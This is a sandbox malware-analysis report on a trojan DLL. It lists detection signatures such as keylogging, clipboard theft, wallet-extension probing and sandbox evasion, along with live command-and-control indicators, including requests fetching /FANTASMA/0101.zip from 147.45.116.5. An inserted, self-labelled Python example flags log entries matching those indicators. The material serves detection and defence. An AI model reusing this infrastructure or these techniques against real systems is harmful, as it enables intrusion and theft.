Windows Analysis Report
T8TY28UxiT.dll

Overview

General Information

Sample name: T8TY28UxiT.dll (renamed because the original name is a hash value)
Original sample name: e0fa9d4894017e66af927bd72df16793.dll
Analysis ID: 1528465
MD5: e0fa9d4894017e66af927bd72df16793
SHA1: b504698acb8d172488277c4fc24a819b1009fdf3
SHA256: fca664019d4465e2f9382c47da8acdf6739ee598191bd748c836a5f752031ad2
Tags: 32, dll, exe, trojan

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Modifies the windows firewall
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to access browser extension known for cryptocurrency wallets
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: T8TY28UxiT.dll ReversingLabs: Detection: 15%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 95.0% probability
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8201F0 BCryptGenRandom,SystemFunction036, 12_2_6C8201F0
Source: ybtrrus.exe Binary or memory string: -----BEGIN RSA PUBLIC KEY-----
Source: T8TY28UxiT.dll Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: T8TY28UxiT.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: g2m.pdb source: rundll32.exe, 0000000C.00000002.1908516008.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll
Source: Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: rundll32.exe, 0000000C.00000003.1880320269.000000000316E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934185341.0000000004D87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000002.2706441073.000000006FE65000.00000002.00000001.01000000.00000008.sdmp, ybtrrus.exe, 00000021.00000002.2704695699.000000006EA25000.00000002.00000001.01000000.0000000C.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C831F00 CloseHandle,memset,FindFirstFileW,FindClose, 12_2_6C831F00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8316F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError, 12_2_6C8316F0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE4C2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError, 28_2_6FE4C2D0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_0545FB74 FindFirstFileW,FindClose, 28_2_0545FB74
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_0545F590 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 28_2_0545F590
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05467CC6 FindFirstFileW, 28_2_05467CC6
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05467DCE GetLogicalDriveStringsW, 28_2_05467DCE
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_5080fa819e61b36dbd2b7e7e74bdf5c819fed0_7522e4b5_75dffb69-1a82-4980-a5db-ce9131bf24b7\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fcdd551db92618d3725e94eeb7507dfc72111acd_7522e4b5_17fea6c8-cf23-47b2-9980-606d9795cdc0\

Networking

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 147.45.116.5 80
Source: global traffic HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1 | accept: */* | host: 147.45.116.5
Source: global traffic HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1 | accept: */* | host: 147.45.116.5
Source: global traffic HTTP traffic detected: GET /index.php?user-PC HTTP/1.1 | accept: */* | host: 147.45.116.5
Source: Joe Sandbox View IP Address: 213.188.196.246
Source: Joe Sandbox View IP Address: 128.138.140.44
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C829F50 recv,WSAGetLastError, 12_2_6C829F50
Source: unknown HTTP traffic detected: POST /Telemetry.Request HTTP/1.1 | Connection: Keep-Alive | User-Agent: MSDW | MSA_DeviceTicket: t=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&p= | Content-Length: 4658 | Host: umwatson.events.data.microsoft.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 21:24:27 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 274Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 31 31 36 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.116.5 Port 80</address></body></html>
Source: rundll32.exe, rundll32.exe, 0000000C.00000002.1908516008.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zip
Source: rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zipc
Source: rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.php
Source: rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.php?user-PC
Source: rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.phpxU_
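The traffic above has the traits an analyst would key a network detection on: rundll32.exe connected to 147.45.116.5 with no preceding DNS query, sent the literal IP as the Host header, omitted the User-Agent, and requested /FANTASMA/0101.zip followed by /index.php?user-PC, where the query string looks like the analysis machine's host name. Two caveats from the report itself: both 0101.zip requests received a 404 at analysis time (Mon, 07 Oct 2024), so the staged archive was not observed being served, and the POST to umwatson.events.data.microsoft.com is Windows Error Reporting traffic from WerFault.exe (User-Agent MSDW, after the rundll32.exe crash), not command and control. The script below is an added example and is not part of the Joe Sandbox report; it correlates a constructed DNS log with a constructed HTTP log and flags requests showing at least two of those traits. The log field layout, the timestamps and the 20.189.173.8 answer for the Watson host are assumptions made for the example.

```python
"""Flag HTTP requests that match the report's C2 traits.

Added example, not part of the Joe Sandbox report. Both log formats below are
assumed, whitespace-separated layouts:
  DNS:  <epoch> <query name> <answer ip>
  HTTP: <epoch> <dst ip> <host header> <method> <uri> <user-agent or "-">
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed DNS answers (the Watson IP is made up for the example).
SAMPLE_DNS = [
    "1728336200 umwatson.events.data.microsoft.com 20.189.173.8",
    "1728336220 www.example.com 93.184.216.34",
]

# Constructed HTTP log mirroring the report: one benign WER upload, one
# ordinary browse, then the two requests rundll32.exe made to 147.45.116.5.
SAMPLE_HTTP = [
    "1728336210 20.189.173.8 umwatson.events.data.microsoft.com POST /Telemetry.Request MSDW",
    "1728336230 93.184.216.34 www.example.com GET /index.html Mozilla/5.0",
    "1728336267 147.45.116.5 147.45.116.5 GET /FANTASMA/0101.zip -",
    "1728336268 147.45.116.5 147.45.116.5 GET /index.php?user-PC -",
]

# URI shapes observed in the report: a numbered staged archive under /FANTASMA/
# and a check-in whose query string carries only the victim host name.
IOC_PATHS = [
    re.compile(r"^/FANTASMA/\d+\.zip$"),
    re.compile(r"^/index\.php\?[A-Za-z0-9_-]+$"),
]


@dataclass
class HttpRecord:
    ts: int
    dst_ip: str
    host: str
    method: str
    uri: str
    user_agent: Optional[str]


def parse_dns(lines: List[str]) -> Dict[str, Tuple[int, str]]:
    """Map each answered IP to the earliest (timestamp, query name) that produced it."""
    resolved: Dict[str, Tuple[int, str]] = {}
    for line in lines:
        ts, qname, ip = line.split()
        resolved.setdefault(ip, (int(ts), qname))
    return resolved


def parse_http(lines: List[str]) -> List[HttpRecord]:
    out = []
    for line in lines:
        # maxsplit=5 keeps a User-Agent that contains spaces in one field
        ts, dst, host, method, uri, ua = line.split(None, 5)
        out.append(HttpRecord(int(ts), dst, host, method, uri, None if ua == "-" else ua))
    return out


def is_literal_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def find_suspicious(dns_lines: List[str], http_lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (uri, reasons) for requests showing at least two of the report's traits."""
    resolved = parse_dns(dns_lines)
    findings = []
    for rec in parse_http(http_lines):
        reasons = []
        answer = resolved.get(rec.dst_ip)
        # a DNS answer that arrives after the connection does not explain it
        if answer is None or answer[0] > rec.ts:
            reasons.append("no DNS answer preceded the connection")
        if is_literal_ip(rec.host):
            reasons.append("Host header is a literal IP")
        if rec.user_agent is None:
            reasons.append("no User-Agent header")
        if any(p.match(rec.uri) for p in IOC_PATHS):
            reasons.append("URI matches a path from the report")
        if len(reasons) >= 2:
            findings.append((rec.uri, reasons))
    return findings


if __name__ == "__main__":
    for uri, reasons in find_suspicious(SAMPLE_DNS, SAMPLE_HTTP):
        print(uri, "->", "; ".join(reasons))
```

The two-trait threshold is deliberate: an internal service called by raw IP trips only the Host check, while this sample trips all four. In a Zeek deployment the same join is http.log against dns.log on the responder address, with the timestamp comparison preventing a later lookup from retroactively excusing an earlier connection.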
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://code.google.com/p/swfobject/
Source: rundll32.exe, 0000000C.00000002.1907873298.000000000316D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934897398.0000000004D87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA.crl0q
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://dev.w3.org/html5/websockets/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://fontawesome.io
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://fontawesome.io/license/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://gimite.net/en/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://javascript.crockford.com/jsmin.html
Source: rundll32.exe, 0000000C.00000002.1907873298.000000000316D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934897398.0000000004D87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0&
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc6455
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.embarcadero.com/products/delphi
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.esegece.com
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 0000001C.00000002.2653315436.00000000029BE000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2124550236.0000000002A0E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.foolabs.com/xpdf
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.ghisler.com/plugins.htm
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000006B57000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 0000001C.00000002.2691639077.00000000077AC000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.0000000006C67000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.000000000777C000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.000000000661F000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 0000002F.00000003.2048238374.000000000779C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.indyproject.org/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: rundll32.exe, 0000000C.00000003.1881319232.000000000316E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934897398.0000000004D87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com.&nbsp;
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000003.1963237274.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2123620807.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000003.1998212742.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.php
Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000003.1963237274.0000000000E87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.php(E~
Source: ybtrrus.exe, 00000021.00000003.1963237274.0000000000E87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.phpiE
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%d
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%dS
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/download.php
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/download.phpS
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/support.php
Source: ybtrrus.exe, 00000021.00000002.2653795251.0000000002BA3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgrade
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002AA3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgrade0
Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgrade6%
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgradeeow.a
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgradeite
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/v3formats
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002AA3000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002BA3000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2124550236.0000000002B10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.secureblackbox.com
Source: ybtrrus.exe, 0000002F.00000002.2124550236.0000000002B10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.secureblackbox.com1)
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.totalcmd.net/directory/packer.html
Source: rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://fontawesome.com
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://fontawesome.com/license/free
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/Yaffle/EventSource/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/muaz-khan/RTCMultiConnection
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/muaz-khan/RTCMultiConnection/issues/778#issuecomment-524853468
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/muaz-khan/RecordRTC
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05468CD6 OpenClipboard, 28_2_05468CD6
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05468DF6 SetClipboardData, 28_2_05468DF6
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05468956 GetClipboardData, 28_2_05468956
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05468926 GetAsyncKeyState, 28_2_05468926
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_054687C6 CreateDesktopW, 28_2_054687C6
Source: C:\Windows\System32\loaddll32.exe Memory allocated: 76D80000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 775A0000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C832910 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError, 12_2_6C832910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7F4430 NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError, 12_2_6C7F4430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8327F0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 12_2_6C8327F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C828701 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 12_2_6C828701
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7F5E50 NtCancelIoFileEx,RtlNtStatusToDosError, 12_2_6C7F5E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7F7920 NtCancelIoFileEx,RtlNtStatusToDosError, 12_2_6C7F7920
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7F3B50 NtCancelIoFileEx,RtlNtStatusToDosError, 12_2_6C7F3B50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7F72C0 NtCancelIoFileEx,RtlNtStatusToDosError, 12_2_6C7F72C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7F4430 NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError, 12_2_6C7F4430
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6C45F6 12_2_6C6C45F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6927E0 12_2_6C6927E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C833DBB 12_2_6C833DBB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6979E0 12_2_6C6979E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6A3B80 12_2_6C6A3B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C699600 12_2_6C699600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6933D2 12_2_6C6933D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6A8CC0 12_2_6C6A8CC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7D0D10 12_2_6C7D0D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C818DF0 12_2_6C818DF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C82CD50 12_2_6C82CD50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C84CEF0 12_2_6C84CEF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C844E00 12_2_6C844E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6A8F10 12_2_6C6A8F10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C818880 12_2_6C818880
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6AE800 12_2_6C6AE800
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8308F0 12_2_6C8308F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C84C910 12_2_6C84C910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C69C980 12_2_6C69C980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C69EA50 12_2_6C69EA50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6B0B40 12_2_6C6B0B40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C818B70 12_2_6C818B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C858470 12_2_6C858470
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C85A590 12_2_6C85A590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6A8550 12_2_6C6A8550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6E0500 12_2_6C6E0500
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C82A511 12_2_6C82A511
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C82E51E 12_2_6C82E51E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7765A0 12_2_6C7765A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C69C630 12_2_6C69C630
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7C4600 12_2_6C7C4600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C80C610 12_2_6C80C610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6B06C0 12_2_6C6B06C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8507C0 12_2_6C8507C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8467E0 12_2_6C8467E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6A8710 12_2_6C6A8710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C85C0E0 12_2_6C85C0E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7840F0 12_2_6C7840F0
